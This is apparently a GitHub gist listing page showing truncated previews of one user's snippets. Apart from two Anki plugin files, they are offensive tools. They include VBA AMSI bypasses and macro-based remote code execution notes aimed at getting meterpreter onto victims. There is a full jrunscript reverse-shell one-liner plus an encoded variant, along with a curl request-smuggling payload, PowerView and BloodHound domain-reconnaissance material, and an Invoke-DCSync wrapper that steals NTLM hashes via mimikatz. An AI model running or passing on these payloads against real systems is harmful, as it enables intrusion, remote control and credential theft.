m1n1 joeminicucci

@joeminicucci
joeminicucci / dictdb.py
Last active August 29, 2015 14:10
chinese plugin mods
# -*- coding: utf-8 -*-
#
# Copyright © 2014 Thomas TEMPÉ, <thomas.tempe@alysse.org>
#
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
#
#COPYRIGHT AND PERMISSION NOTICE
#Copyright © 1991-2012 Unicode, Inc. All rights reserved. Distributed under the Terms of Use in http://www.unicode.org/copyright.html.
joeminicucci / fill_missing.py
Created December 6, 2014 11:47
autofill (chinese support)
# -*- coding: utf-8 -*-
#
# Copyright © 2013 Chris Hatch, <foonugget@gmail.com>
#
# License: GNU GPL, version 3 or later; http://www.gnu.org/copyleft/gpl.html
#
from aqt.utils import showInfo
from anki.find import Finder
from edit_behavior_model import *
joeminicucci / gist:7dd5190dc31c43c518abb489ec77903d
Created September 8, 2019 04:12
VBA AMSI Bypasses (from outflanknl)
'##################################################################################
' Code samples for AMSI bypass techniques
' relating to the blogpost on AMSI bypasses on https://outflank.nl/blog/
'##################################################################################
' ##################################################################################
' AMSI Bypass approach that abuses trusted locations (sample for Word)
' ##################################################################################
joeminicucci / Various-Macro-Based-RCEs.md
Created September 8, 2019 04:21 — forked from mgeeky/Various-Macro-Based-RCEs.md
Various Visual Basic Macros-based Remote Code Execution techniques to get your meterpreter invoked on the infected machine.

This is a note for myself describing various Visual Basic macros construction strategies that could be used for remote code execution via malicious Document vector. Nothing new or fancy here, just a list of techniques, tools and scripts collected in one place for a quick glimpse of an eye before setting a payload.

All of the examples below were generated using 192.168.56.101 as the remote address.

List:

  1. Page substitution macro for luring user to click Enable Content
  2. The Unicorn Powershell based payload
# taken from http://www.piware.de/2011/01/creating-an-https-server-in-python/
# generate server.pem with the following command:
# openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
# run as follows:
# python simple-https-server.py
# then in your browser, visit:
# https://localhost:4443
import BaseHTTPServer, SimpleHTTPServer
import ssl

Nashorn / Rhino:

  • Reverse Shell
$ jrunscript -e 'var host="localhost"; var port=8044; var cmd="cmd.exe"; var p=new java.lang.ProcessBuilder(cmd).redirectErrorStream(true).start();var s=new java.net.Socket(host,port);var pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();var po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();java.lang.Thread.sleep(50);try {p.exitValue();break;}catch (e){}};p.destroy();s.close();'
  • Reverse Shell (Base-64 encoded)
$ jrunscript -e 'eval(new java.lang.String(javax.xml.bind.DatatypeConverter.parseBase64Binary("dmFyIGhvc3Q9ImxvY2FsaG9zdCI7IHZhciBwb3J0PTgwNDQ7IHZhciBjbWQ9ImNtZC5leGUiOyB2YXIgcD1uZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKGNtZCkucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzPW5ldyBqYXZhLm5ldC5Tb2NrZXQoaG9zdCxwb3J0KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V
#CL:TE -- Standard CL and TE
curl -i -s -k -X $'POST' \
-H $'Host: subdomain1.joe.pr.qing-wen.com/' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 382' -H $'Transfer-Encoding: chunked' \
--data-binary $'172\x0d\x0aPOST /def HTTP/1.1\x0d\x0aHost: subdomain1.joe.pr.qing-wen.com/\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\x0d\x0aAccept-Language: en-US,en;q=0.5\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aConnection: keep-alive\x0d\x0aUpgrade-Insecure-Requests: 1\x0d\x0aCache-Control: max-age=0\x0d\x0a0\x0d\x0a\x0d\x0a' \
$'https://subdomain1.j
joeminicucci / DerivativeAdmin.ps1
Created November 10, 2019 07:56
Derivative Admin search using PowerView with Dijkstra's algorithm
# From https://wald0.com/?p=14
# Requires PowerView
$Graph = @()
$Infinity = [int]::MaxValue
$Nodes = Get-NetUser | ForEach-Object { $_.samaccountname }
$Nodes += Get-NetComputer
ForEach($Node in $Nodes){
$Vertex = New-Object PSObject
joeminicucci / Invoke-DCSync.ps1
Created January 23, 2020 02:30 — forked from monoxgas/Invoke-DCSync.ps1
What more could you want?
function Invoke-DCSync
{
<#
.SYNOPSIS
Uses dcsync from mimikatz to collect NTLM hashes from the domain.
Author: @monoxgas
Improved by: @harmj0y
joeminicucci / BloodhoundCheatSheet.md
Created February 13, 2020 05:54
DogWhisperer - BloodHound Cypher Cheat Sheet (v2)